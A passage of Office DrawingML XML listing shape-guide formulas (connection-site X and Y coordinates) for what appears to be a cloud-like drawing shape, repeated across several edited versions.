                <a:gd name="connsiteY5-322" fmla="*/ 2340 h 76558"/>
                <a:gd name="connsiteX6-323" fmla="*/ 35499 w 43256"/>
                <a:gd name="connsiteY6-324" fmla="*/ 549 h 76558"/>
                <a:gd name="connsiteX7-325" fmla="*/ 38354 w 43256"/>
                <a:gd name="connsiteY7-326" fmla="*/ 5435 h 76558"/>
                <a:gd name="connsiteX8-327" fmla="*/ 42018 w 43256"/>
                <a:gd name="connsiteY8-328" fmla="*/ 10177 h 76558"/>
                <a:gd name="connsiteX9-329" fmla="*/ 41854 w 43256"/>
                <a:gd name="connsiteY9-330" fmla="*/ 15319 h 76558"/>
                <a:gd name="connsiteX10-331" fmla="*/ 43052 w 43256"/>
                <a:gd name="connsiteY10-332" fmla="*/ 23181 h 76558"/>
                <a:gd name="connsiteX11-333" fmla="*/ 37440 w 43256"/>
                <a:gd name="connsiteY11-334" fmla="*/ 30063 h 76558"/>
                <a:gd name="connsiteX12-335" fmla="*/ 35431 w 43256"/>
                <a:gd name="connsiteY12-336" fmla="*/ 37710 h 76558"/>
                <a:gd name="connsiteX13-337" fmla="*/ 28591 w 43256"/>
                <a:gd name="connsiteY13-338" fmla="*/ 36674 h 76558"/>
                <a:gd name="connsiteX14-339" fmla="*/ 23703 w 43256"/>
                <a:gd name="connsiteY14-340" fmla="*/ 42965 h 76558"/>
                <a:gd name="connsiteX15-341" fmla="*/ 16516 w 43256"/>
                <a:gd name="connsiteY15-342" fmla="*/ 39125 h 76558"/>
                <a:gd name="connsiteX16-343" fmla="*/ 5840 w 43256"/>
                <a:gd name="connsiteY16-344" fmla="*/ 35331 h 76558"/>
                <a:gd name="connsiteX17-345" fmla="*/ 1146 w 43256"/>
                <a:gd name="connsiteY17-346" fmla="*/ 31109 h 76558"/>
                <a:gd name="connsiteX18-347" fmla="*/ 2149 w 43256"/>
                <a:gd name="connsiteY18-348" fmla="*/ 25410 h 76558"/>
                <a:gd name="connsiteX19-349" fmla="*/ 31 w 43256"/>
                <a:gd name="connsiteY19-350" fmla="*/ 19563 h 76558"/>
                <a:gd name="connsiteX20-351" fmla="*/ 3899 w 43256"/>
                <a:gd name="connsiteY20-352" fmla="*/ 14366 h 76558"/>
                <a:gd name="connsiteX21-353" fmla="*/ 3936 w 43256"/>
                <a:gd name="connsiteY21-354" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-355" fmla="*/ 528711 w 1999669"/>
                <a:gd name="connsiteY0-356" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX1-357" fmla="*/ 498557 w 1999669"/>
                <a:gd name="connsiteY1-358" fmla="*/ 1923764 h 1923764"/>
                <a:gd name="connsiteX2-359" fmla="*/ 468403 w 1999669"/>
                <a:gd name="connsiteY2-360" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX3-361" fmla="*/ 498557 w 1999669"/>
                <a:gd name="connsiteY3-362" fmla="*/ 1863456 h 1923764"/>
                <a:gd name="connsiteX4-363" fmla="*/ 528711 w 1999669"/>
                <a:gd name="connsiteY4-364" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX0-365" fmla="*/ 653405 w 1999669"/>
                <a:gd name="connsiteY0-366" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX1-367" fmla="*/ 593097 w 1999669"/>
                <a:gd name="connsiteY1-368" fmla="*/ 1698672 h 1923764"/>
                <a:gd name="connsiteX2-369" fmla="*/ 532789 w 1999669"/>
                <a:gd name="connsiteY2-370" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX3-371" fmla="*/ 593097 w 1999669"/>
                <a:gd name="connsiteY3-372" fmla="*/ 1578056 h 1923764"/>
                <a:gd name="connsiteX4-373" fmla="*/ 653405 w 1999669"/>
                <a:gd name="connsiteY4-374" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX0-375" fmla="*/ 799045 w 1999669"/>
                <a:gd name="connsiteY0-376" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX1-377" fmla="*/ 708583 w 1999669"/>
                <a:gd name="connsiteY1-378" fmla="*/ 1417027 h 1923764"/>
                <a:gd name="connsiteX2-379" fmla="*/ 618121 w 1999669"/>
                <a:gd name="connsiteY2-380" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX3-381" fmla="*/ 708583 w 1999669"/>
                <a:gd name="connsiteY3-382" fmla="*/ 1236103 h 1923764"/>
                <a:gd name="connsiteX4-383" fmla="*/ 799045 w 1999669"/>
                <a:gd name="connsiteY4-384" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX0-385" fmla="*/ 4729 w 43256"/>
                <a:gd name="connsiteY0-386" fmla="*/ 26036 h 76558"/>
                <a:gd name="connsiteX1-387" fmla="*/ 2196 w 43256"/>
                <a:gd name="connsiteY1-388" fmla="*/ 25239 h 76558"/>
                <a:gd name="connsiteX2-389" fmla="*/ 6964 w 43256"/>
                <a:gd name="connsiteY2-390" fmla="*/ 34758 h 76558"/>
                <a:gd name="connsiteX3-391" fmla="*/ 5856 w 43256"/>
                <a:gd name="connsiteY3-392" fmla="*/ 35139 h 76558"/>
                <a:gd name="connsiteX4-393" fmla="*/ 16514 w 43256"/>
                <a:gd name="connsiteY4-394" fmla="*/ 38949 h 76558"/>
                <a:gd name="connsiteX5-395" fmla="*/ 15846 w 43256"/>
                <a:gd name="connsiteY5-396" fmla="*/ 37209 h 76558"/>
                <a:gd name="connsiteX6-397" fmla="*/ 29814 w 43256"/>
                <a:gd name="connsiteY6-398" fmla="*/ 39159 h 76558"/>
                <a:gd name="connsiteX7-399" fmla="*/ 28406 w 43256"/>
                <a:gd name="connsiteY7-400" fmla="*/ 40718 h 76558"/>
                <a:gd name="connsiteX8-401" fmla="*/ 34165 w 43256"/>
                <a:gd name="connsiteY8-402" fmla="*/ 22813 h 76558"/>
                <a:gd name="connsiteX9-403" fmla="*/ 37416 w 43256"/>
                <a:gd name="connsiteY9-404" fmla="*/ 29949 h 76558"/>
                <a:gd name="connsiteX10-405" fmla="*/ 41834 w 43256"/>
                <a:gd name="connsiteY10-406" fmla="*/ 15213 h 76558"/>
                <a:gd name="connsiteX11-407" fmla="*/ 40386 w 43256"/>
                <a:gd name="connsiteY11-408" fmla="*/ 17889 h 76558"/>
                <a:gd name="connsiteX12-409" fmla="*/ 38360 w 43256"/>
                <a:gd name="connsiteY12-410" fmla="*/ 5285 h 76558"/>
                <a:gd name="connsiteX13-411" fmla="*/ 38436 w 43256"/>
                <a:gd name="connsiteY13-412" fmla="*/ 6549 h 76558"/>
                <a:gd name="connsiteX14-413" fmla="*/ 29114 w 43256"/>
                <a:gd name="connsiteY14-414" fmla="*/ 3811 h 76558"/>
                <a:gd name="connsiteX15-415" fmla="*/ 29856 w 43256"/>
                <a:gd name="connsiteY15-416" fmla="*/ 2199 h 76558"/>
                <a:gd name="connsiteX16-417" fmla="*/ 22177 w 43256"/>
                <a:gd name="connsiteY16-418" fmla="*/ 4579 h 76558"/>
                <a:gd name="connsiteX17-419" fmla="*/ 22536 w 43256"/>
                <a:gd name="connsiteY17-420" fmla="*/ 3189 h 76558"/>
                <a:gd name="connsiteX18-421" fmla="*/ 14036 w 43256"/>
                <a:gd name="connsiteY18-422" fmla="*/ 5051 h 76558"/>
                <a:gd name="connsiteX19-423" fmla="*/ 15336 w 43256"/>
                <a:gd name="connsiteY19-424" fmla="*/ 6399 h 76558"/>
                <a:gd name="connsiteX20-425" fmla="*/ 4163 w 43256"/>
                <a:gd name="connsiteY20-426" fmla="*/ 15648 h 76558"/>
                <a:gd name="connsiteX21-427" fmla="*/ 3936 w 43256"/>
                <a:gd name="connsiteY21-428" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-429" fmla="*/ 3936 w 43256"/>
                <a:gd name="connsiteY0-430" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX1-431" fmla="*/ 5659 w 43256"/>
                <a:gd name="connsiteY1-432" fmla="*/ 6766 h 76558"/>
                <a:gd name="connsiteX2-433" fmla="*/ 14041 w 43256"/>
                <a:gd name="connsiteY2-434" fmla="*/ 5061 h 76558"/>
                <a:gd name="connsiteX3-435" fmla="*/ 22492 w 43256"/>
                <a:gd name="connsiteY3-436" fmla="*/ 3291 h 76558"/>
                <a:gd name="connsiteX4-437" fmla="*/ 25785 w 43256"/>
                <a:gd name="connsiteY4-438" fmla="*/ 59 h 76558"/>
                <a:gd name="connsiteX5-439" fmla="*/ 29869 w 43256"/>
                <a:gd name="connsiteY5-440" fmla="*/ 2340 h 76558"/>
                <a:gd name="connsiteX6-441" fmla="*/ 35499 w 43256"/>
                <a:gd name="connsiteY6-442" fmla="*/ 549 h 76558"/>
                <a:gd name="connsiteX7-443" fmla="*/ 38354 w 43256"/>
                <a:gd name="connsiteY7-444" fmla="*/ 5435 h 76558"/>
                <a:gd name="connsiteX8-445" fmla="*/ 42018 w 43256"/>
                <a:gd name="connsiteY8-446" fmla="*/ 10177 h 76558"/>
                <a:gd name="connsiteX9-447" fmla="*/ 41854 w 43256"/>
                <a:gd name="connsiteY9-448" fmla="*/ 15319 h 76558"/>
                <a:gd name="connsiteX10-449" fmla="*/ 43052 w 43256"/>
                <a:gd name="connsiteY10-450" fmla="*/ 23181 h 76558"/>
                <a:gd name="connsiteX11-451" fmla="*/ 37440 w 43256"/>
                <a:gd name="connsiteY11-452" fmla="*/ 30063 h 76558"/>
                <a:gd name="connsiteX12-453" fmla="*/ 35431 w 43256"/>
                <a:gd name="connsiteY12-454" fmla="*/ 37710 h 76558"/>
                <a:gd name="connsiteX13-455" fmla="*/ 28591 w 43256"/>
                <a:gd name="connsiteY13-456" fmla="*/ 36674 h 76558"/>
                <a:gd name="connsiteX14-457" fmla="*/ 23703 w 43256"/>
                <a:gd name="connsiteY14-458" fmla="*/ 42965 h 76558"/>
                <a:gd name="connsiteX15-459" fmla="*/ 16516 w 43256"/>
                <a:gd name="connsiteY15-460" fmla="*/ 39125 h 76558"/>
                <a:gd name="connsiteX16-461" fmla="*/ 5840 w 43256"/>
                <a:gd name="connsiteY16-462" fmla="*/ 35331 h 76558"/>
                <a:gd name="connsiteX17-463" fmla="*/ 1146 w 43256"/>
                <a:gd name="connsiteY17-464" fmla="*/ 31109 h 76558"/>
                <a:gd name="connsiteX18-465" fmla="*/ 2149 w 43256"/>
                <a:gd name="connsiteY18-466" fmla="*/ 25410 h 76558"/>
                <a:gd name="connsiteX19-467" fmla="*/ 31 w 43256"/>
                <a:gd name="connsiteY19-468" fmla="*/ 19563 h 76558"/>
                <a:gd name="connsiteX20-469" fmla="*/ 3899 w 43256"/>
                <a:gd name="connsiteY20-470" fmla="*/ 14366 h 76558"/>
                <a:gd name="connsiteX21-471" fmla="*/ 3936 w 43256"/>
                <a:gd name="connsiteY21-472" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-473" fmla="*/ 528711 w 1999669"/>
                <a:gd name="connsiteY0-474" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX1-475" fmla="*/ 498557 w 1999669"/>
                <a:gd name="connsiteY1-476" fmla="*/ 1923764 h 1923764"/>
                <a:gd name="connsiteX2-477" fmla="*/ 468403 w 1999669"/>
                <a:gd name="connsiteY2-478" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX3-479" fmla="*/ 498557 w 1999669"/>
                <a:gd name="connsiteY3-480" fmla="*/ 1863456 h 1923764"/>
                <a:gd name="connsiteX4-481" fmla="*/ 528711 w 1999669"/>
                <a:gd name="connsiteY4-482" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX0-483" fmla="*/ 653405 w 1999669"/>
                <a:gd name="connsiteY0-484" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX1-485" fmla="*/ 593097 w 1999669"/>
                <a:gd name="connsiteY1-486" fmla="*/ 1698672 h 1923764"/>
                <a:gd name="connsiteX2-487" fmla="*/ 532789 w 1999669"/>
                <a:gd name="connsiteY2-488" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX3-489" fmla="*/ 593097 w 1999669"/>
                <a:gd name="connsiteY3-490" fmla="*/ 1578056 h 1923764"/>
                <a:gd name="connsiteX4-491" fmla="*/ 653405 w 1999669"/>
                <a:gd name="connsiteY4-492" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX0-493" fmla="*/ 799045 w 1999669"/>
                <a:gd name="connsiteY0-494" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX1-495" fmla="*/ 708583 w 1999669"/>
                <a:gd name="connsiteY1-496" fmla="*/ 1417027 h 1923764"/>
                <a:gd name="connsiteX2-497" fmla="*/ 618121 w 1999669"/>
                <a:gd name="connsiteY2-498" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX3-499" fmla="*/ 708583 w 1999669"/>
                <a:gd name="connsiteY3-500" fmla="*/ 1236103 h 1923764"/>
                <a:gd name="connsiteX4-501" fmla="*/ 799045 w 1999669"/>
                <a:gd name="connsiteY4-502" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX0-503" fmla="*/ 4729 w 43256"/>
                <a:gd name="connsiteY0-504" fmla="*/ 26036 h 76558"/>
                <a:gd name="connsiteX1-505" fmla="*/ 2196 w 43256"/>
                <a:gd name="connsiteY1-506" fmla="*/ 25239 h 76558"/>
                <a:gd name="connsiteX2-507" fmla="*/ 6964 w 43256"/>
                <a:gd name="connsiteY2-508" fmla="*/ 34758 h 76558"/>
                <a:gd name="connsiteX3-509" fmla="*/ 5856 w 43256"/>
                <a:gd name="connsiteY3-510" fmla="*/ 35139 h 76558"/>
                <a:gd name="connsiteX4-511" fmla="*/ 16514 w 43256"/>
                <a:gd name="connsiteY4-512" fmla="*/ 38949 h 76558"/>
                <a:gd name="connsiteX5-513" fmla="*/ 15846 w 43256"/>
                <a:gd name="connsiteY5-514" fmla="*/ 37209 h 76558"/>
                <a:gd name="connsiteX6-515" fmla="*/ 29814 w 43256"/>
                <a:gd name="connsiteY6-516" fmla="*/ 39159 h 76558"/>
                <a:gd name="connsiteX7-517" fmla="*/ 28406 w 43256"/>
                <a:gd name="connsiteY7-518" fmla="*/ 40718 h 76558"/>
                <a:gd name="connsiteX8-519" fmla="*/ 34165 w 43256"/>
                <a:gd name="connsiteY8-520" fmla="*/ 22813 h 76558"/>
                <a:gd name="connsiteX9-521" fmla="*/ 39698 w 43256"/>
                <a:gd name="connsiteY9-522" fmla="*/ 33448 h 76558"/>
                <a:gd name="connsiteX10-523" fmla="*/ 41834 w 43256"/>
                <a:gd name="connsiteY10-524" fmla="*/ 15213 h 76558"/>
                <a:gd name="connsiteX11-525" fmla="*/ 40386 w 43256"/>
                <a:gd name="connsiteY11-526" fmla="*/ 17889 h 76558"/>
                <a:gd name="connsiteX12-527" fmla="*/ 38360 w 43256"/>
                <a:gd name="connsiteY12-528" fmla="*/ 5285 h 76558"/>
                <a:gd name="connsiteX13-529" fmla="*/ 38436 w 43256"/>
                <a:gd name="connsiteY13-530" fmla="*/ 6549 h 76558"/>
                <a:gd name="connsiteX14-531" fmla="*/ 29114 w 43256"/>
                <a:gd name="connsiteY14-532" fmla="*/ 3811 h 76558"/>
                <a:gd name="connsiteX15-533" fmla="*/ 29856 w 43256"/>
                <a:gd name="connsiteY15-534" fmla="*/ 2199 h 76558"/>
                <a:gd name="connsiteX16-535" fmla="*/ 22177 w 43256"/>
                <a:gd name="connsiteY16-536" fmla="*/ 4579 h 76558"/>
                <a:gd name="connsiteX17-537" fmla="*/ 22536 w 43256"/>
                <a:gd name="connsiteY17-538" fmla="*/ 3189 h 76558"/>
                <a:gd name="connsiteX18-539" fmla="*/ 14036 w 43256"/>
                <a:gd name="connsiteY18-540" fmla="*/ 5051 h 76558"/>
                <a:gd name="connsiteX19-541" fmla="*/ 15336 w 43256"/>
                <a:gd name="connsiteY19-542" fmla="*/ 6399 h 76558"/>
                <a:gd name="connsiteX20-543" fmla="*/ 4163 w 43256"/>
                <a:gd name="connsiteY20-544" fmla="*/ 15648 h 76558"/>
                <a:gd name="connsiteX21-545" fmla="*/ 3936 w 43256"/>
                <a:gd name="connsiteY21-546" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-547" fmla="*/ 3936 w 43315"/>
                <a:gd name="connsiteY0-548" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX1-549" fmla="*/ 5659 w 43315"/>
                <a:gd name="connsiteY1-550" fmla="*/ 6766 h 76558"/>
                <a:gd name="connsiteX2-551" fmla="*/ 14041 w 43315"/>
                <a:gd name="connsiteY2-552" fmla="*/ 5061 h 76558"/>
                <a:gd name="connsiteX3-553" fmla="*/ 22492 w 43315"/>
                <a:gd name="connsiteY3-554" fmla="*/ 3291 h 76558"/>
                <a:gd name="connsiteX4-555" fmla="*/ 25785 w 43315"/>
                <a:gd name="connsiteY4-556" fmla="*/ 59 h 76558"/>
                <a:gd name="connsiteX5-557" fmla="*/ 29869 w 43315"/>
                <a:gd name="connsiteY5-558" fmla="*/ 2340 h 76558"/>
                <a:gd name="connsiteX6-559" fmla="*/ 35499 w 43315"/>
                <a:gd name="connsiteY6-560" fmla="*/ 549 h 76558"/>
                <a:gd name="connsiteX7-561" fmla="*/ 38354 w 43315"/>
                <a:gd name="connsiteY7-562" fmla="*/ 5435 h 76558"/>
                <a:gd name="connsiteX8-563" fmla="*/ 42018 w 43315"/>
                <a:gd name="connsiteY8-564" fmla="*/ 10177 h 76558"/>
                <a:gd name="connsiteX9-565" fmla="*/ 41854 w 43315"/>
                <a:gd name="connsiteY9-566" fmla="*/ 15319 h 76558"/>
                <a:gd name="connsiteX10-567" fmla="*/ 43052 w 43315"/>
                <a:gd name="connsiteY10-568" fmla="*/ 23181 h 76558"/>
                <a:gd name="connsiteX11-569" fmla="*/ 38011 w 43315"/>
                <a:gd name="connsiteY11-570" fmla="*/ 33912 h 76558"/>
                <a:gd name="connsiteX12-571" fmla="*/ 35431 w 43315"/>
                <a:gd name="connsiteY12-572" fmla="*/ 37710 h 76558"/>
                <a:gd name="connsiteX13-573" fmla="*/ 28591 w 43315"/>
                <a:gd name="connsiteY13-574" fmla="*/ 36674 h 76558"/>
                <a:gd name="connsiteX14-575" fmla="*/ 23703 w 43315"/>
                <a:gd name="connsiteY14-576" fmla="*/ 42965 h 76558"/>
                <a:gd name="connsiteX15-577" fmla="*/ 16516 w 43315"/>
                <a:gd name="connsiteY15-578" fmla="*/ 39125 h 76558"/>
                <a:gd name="connsiteX16-579" fmla="*/ 5840 w 43315"/>
                <a:gd name="connsiteY16-580" fmla="*/ 35331 h 76558"/>
                <a:gd name="connsiteX17-581" fmla="*/ 1146 w 43315"/>
                <a:gd name="connsiteY17-582" fmla="*/ 31109 h 76558"/>
                <a:gd name="connsiteX18-583" fmla="*/ 2149 w 43315"/>
                <a:gd name="connsiteY18-584" fmla="*/ 25410 h 76558"/>
                <a:gd name="connsiteX19-585" fmla="*/ 31 w 43315"/>
                <a:gd name="connsiteY19-586" fmla="*/ 19563 h 76558"/>
                <a:gd name="connsiteX20-587" fmla="*/ 3899 w 43315"/>
                <a:gd name="connsiteY20-588" fmla="*/ 14366 h 76558"/>
                <a:gd name="connsiteX21-589" fmla="*/ 3936 w 43315"/>
                <a:gd name="connsiteY21-590" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-591" fmla="*/ 528711 w 2002396"/>
                <a:gd name="connsiteY0-592" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX1-593" fmla="*/ 498557 w 2002396"/>
                <a:gd name="connsiteY1-594" fmla="*/ 1923764 h 1923764"/>
                <a:gd name="connsiteX2-595" fmla="*/ 468403 w 2002396"/>
                <a:gd name="connsiteY2-596" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX3-597" fmla="*/ 498557 w 2002396"/>
                <a:gd name="connsiteY3-598" fmla="*/ 1863456 h 1923764"/>
                <a:gd name="connsiteX4-599" fmla="*/ 528711 w 2002396"/>
                <a:gd name="connsiteY4-600" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX0-601" fmla="*/ 653405 w 2002396"/>
                <a:gd name="connsiteY0-602" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX1-603" fmla="*/ 593097 w 2002396"/>
                <a:gd name="connsiteY1-604" fmla="*/ 1698672 h 1923764"/>
                <a:gd name="connsiteX2-605" fmla="*/ 532789 w 2002396"/>
                <a:gd name="connsiteY2-606" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX3-607" fmla="*/ 593097 w 2002396"/>
                <a:gd name="connsiteY3-608" fmla="*/ 1578056 h 1923764"/>
                <a:gd name="connsiteX4-609" fmla="*/ 653405 w 2002396"/>
                <a:gd name="connsiteY4-610" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX0-611" fmla="*/ 799045 w 2002396"/>
                <a:gd name="connsiteY0-612" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX1-613" fmla="*/ 708583 w 2002396"/>
                <a:gd name="connsiteY1-614" fmla="*/ 1417027 h 1923764"/>
                <a:gd name="connsiteX2-615" fmla="*/ 618121 w 2002396"/>
                <a:gd name="connsiteY2-616" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX3-617" fmla="*/ 708583 w 2002396"/>
                <a:gd name="connsiteY3-618" fmla="*/ 1236103 h 1923764"/>
                <a:gd name="connsiteX4-619" fmla="*/ 799045 w 2002396"/>
                <a:gd name="connsiteY4-620" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX0-621" fmla="*/ 4729 w 43315"/>
                <a:gd name="connsiteY0-622" fmla="*/ 26036 h 76558"/>
                <a:gd name="connsiteX1-623" fmla="*/ 2196 w 43315"/>
                <a:gd name="connsiteY1-624" fmla="*/ 25239 h 76558"/>
                <a:gd name="connsiteX2-625" fmla="*/ 6964 w 43315"/>
                <a:gd name="connsiteY2-626" fmla="*/ 34758 h 76558"/>
                <a:gd name="connsiteX3-627" fmla="*/ 5856 w 43315"/>
                <a:gd name="connsiteY3-628" fmla="*/ 35139 h 76558"/>
                <a:gd name="connsiteX4-629" fmla="*/ 16514 w 43315"/>
                <a:gd name="connsiteY4-630" fmla="*/ 38949 h 76558"/>
                <a:gd name="connsiteX5-631" fmla="*/ 15846 w 43315"/>
                <a:gd name="connsiteY5-632" fmla="*/ 37209 h 76558"/>
                <a:gd name="connsiteX6-633" fmla="*/ 29814 w 43315"/>
                <a:gd name="connsiteY6-634" fmla="*/ 39159 h 76558"/>
                <a:gd name="connsiteX7-635" fmla="*/ 28406 w 43315"/>
                <a:gd name="connsiteY7-636" fmla="*/ 40718 h 76558"/>
                <a:gd name="connsiteX8-637" fmla="*/ 34165 w 43315"/>
                <a:gd name="connsiteY8-638" fmla="*/ 22813 h 76558"/>
                <a:gd name="connsiteX9-639" fmla="*/ 39698 w 43315"/>
                <a:gd name="connsiteY9-640" fmla="*/ 33448 h 76558"/>
                <a:gd name="connsiteX10-641" fmla="*/ 41834 w 43315"/>
                <a:gd name="connsiteY10-642" fmla="*/ 15213 h 76558"/>
                <a:gd name="connsiteX11-643" fmla="*/ 40386 w 43315"/>
                <a:gd name="connsiteY11-644" fmla="*/ 17889 h 76558"/>
                <a:gd name="connsiteX12-645" fmla="*/ 38360 w 43315"/>
                <a:gd name="connsiteY12-646" fmla="*/ 5285 h 76558"/>
                <a:gd name="connsiteX13-647" fmla="*/ 38436 w 43315"/>
                <a:gd name="connsiteY13-648" fmla="*/ 6549 h 76558"/>
                <a:gd name="connsiteX14-649" fmla="*/ 29114 w 43315"/>
                <a:gd name="connsiteY14-650" fmla="*/ 3811 h 76558"/>
                <a:gd name="connsiteX15-651" fmla="*/ 29856 w 43315"/>
                <a:gd name="connsiteY15-652" fmla="*/ 2199 h 76558"/>
                <a:gd name="connsiteX16-653" fmla="*/ 22177 w 43315"/>
                <a:gd name="connsiteY16-654" fmla="*/ 4579 h 76558"/>
                <a:gd name="connsiteX17-655" fmla="*/ 22536 w 43315"/>
                <a:gd name="connsiteY17-656" fmla="*/ 3189 h 76558"/>
                <a:gd name="connsiteX18-657" fmla="*/ 14036 w 43315"/>
                <a:gd name="connsiteY18-658" fmla="*/ 5051 h 76558"/>
                <a:gd name="connsiteX19-659" fmla="*/ 15336 w 43315"/>
                <a:gd name="connsiteY19-660" fmla="*/ 6399 h 76558"/>
                <a:gd name="connsiteX20-661" fmla="*/ 4163 w 43315"/>
                <a:gd name="connsiteY20-662" fmla="*/ 15648 h 76558"/>
                <a:gd name="connsiteX21-663" fmla="*/ 3936 w 43315"/>
                <a:gd name="connsiteY21-664" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-665" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY0-666" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX1-667" fmla="*/ 5659 w 44692"/>
                <a:gd name="connsiteY1-668" fmla="*/ 6766 h 76558"/>
                <a:gd name="connsiteX2-669" fmla="*/ 14041 w 44692"/>
                <a:gd name="connsiteY2-670" fmla="*/ 5061 h 76558"/>
                <a:gd name="connsiteX3-671" fmla="*/ 22492 w 44692"/>
                <a:gd name="connsiteY3-672" fmla="*/ 3291 h 76558"/>
                <a:gd name="connsiteX4-673" fmla="*/ 25785 w 44692"/>
                <a:gd name="connsiteY4-674" fmla="*/ 59 h 76558"/>
                <a:gd name="connsiteX5-675" fmla="*/ 29869 w 44692"/>
                <a:gd name="connsiteY5-676" fmla="*/ 2340 h 76558"/>
                <a:gd name="connsiteX6-677" fmla="*/ 35499 w 44692"/>
                <a:gd name="connsiteY6-678" fmla="*/ 549 h 76558"/>
                <a:gd name="connsiteX7-679" fmla="*/ 38354 w 44692"/>
                <a:gd name="connsiteY7-680" fmla="*/ 5435 h 76558"/>
                <a:gd name="connsiteX8-681" fmla="*/ 42018 w 44692"/>
                <a:gd name="connsiteY8-682" fmla="*/ 10177 h 76558"/>
                <a:gd name="connsiteX9-683" fmla="*/ 41854 w 44692"/>
                <a:gd name="connsiteY9-684" fmla="*/ 15319 h 76558"/>
                <a:gd name="connsiteX10-685" fmla="*/ 44574 w 44692"/>
                <a:gd name="connsiteY10-686" fmla="*/ 25280 h 76558"/>
                <a:gd name="connsiteX11-687" fmla="*/ 38011 w 44692"/>
                <a:gd name="connsiteY11-688" fmla="*/ 33912 h 76558"/>
                <a:gd name="connsiteX12-689" fmla="*/ 35431 w 44692"/>
                <a:gd name="connsiteY12-690" fmla="*/ 37710 h 76558"/>
                <a:gd name="connsiteX13-691" fmla="*/ 28591 w 44692"/>
                <a:gd name="connsiteY13-692" fmla="*/ 36674 h 76558"/>
                <a:gd name="connsiteX14-693" fmla="*/ 23703 w 44692"/>
                <a:gd name="connsiteY14-694" fmla="*/ 42965 h 76558"/>
                <a:gd name="connsiteX15-695" fmla="*/ 16516 w 44692"/>
                <a:gd name="connsiteY15-696" fmla="*/ 39125 h 76558"/>
                <a:gd name="connsiteX16-697" fmla="*/ 5840 w 44692"/>
                <a:gd name="connsiteY16-698" fmla="*/ 35331 h 76558"/>
                <a:gd name="connsiteX17-699" fmla="*/ 1146 w 44692"/>
                <a:gd name="connsiteY17-700" fmla="*/ 31109 h 76558"/>
                <a:gd name="connsiteX18-701" fmla="*/ 2149 w 44692"/>
                <a:gd name="connsiteY18-702" fmla="*/ 25410 h 76558"/>
                <a:gd name="connsiteX19-703" fmla="*/ 31 w 44692"/>
                <a:gd name="connsiteY19-704" fmla="*/ 19563 h 76558"/>
                <a:gd name="connsiteX20-705" fmla="*/ 3899 w 44692"/>
                <a:gd name="connsiteY20-706" fmla="*/ 14366 h 76558"/>
                <a:gd name="connsiteX21-707" fmla="*/ 3936 w 44692"/>
                <a:gd name="connsiteY21-708" fmla="*/ 14229 h 76558"/>
                <a:gd name="connsiteX0-709" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY0-710" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX1-711" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY1-712" fmla="*/ 1923764 h 1923764"/>
                <a:gd name="connsiteX2-713" fmla="*/ 468403 w 2066053"/>
                <a:gd name="connsiteY2-714" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX3-715" fmla="*/ 498557 w 2066053"/>
                <a:gd name="connsiteY3-716" fmla="*/ 1863456 h 1923764"/>
                <a:gd name="connsiteX4-717" fmla="*/ 528711 w 2066053"/>
                <a:gd name="connsiteY4-718" fmla="*/ 1893610 h 1923764"/>
                <a:gd name="connsiteX0-719" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY0-720" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX1-721" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY1-722" fmla="*/ 1698672 h 1923764"/>
                <a:gd name="connsiteX2-723" fmla="*/ 532789 w 2066053"/>
                <a:gd name="connsiteY2-724" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX3-725" fmla="*/ 593097 w 2066053"/>
                <a:gd name="connsiteY3-726" fmla="*/ 1578056 h 1923764"/>
                <a:gd name="connsiteX4-727" fmla="*/ 653405 w 2066053"/>
                <a:gd name="connsiteY4-728" fmla="*/ 1638364 h 1923764"/>
                <a:gd name="connsiteX0-729" fmla="*/ 799045 w 2066053"/>
                <a:gd name="connsiteY0-730" fmla="*/ 1326565 h 1923764"/>
                <a:gd name="connsiteX1-731" fmla="*/ 708583 w 2066053"/>
                <a:gd name="connsiteY1-732" fmla="*/ 1417027 h 1923764"/>
                <a:gd name="connsiteX2-733" fmla="*/ 618121 w 2066053"/>
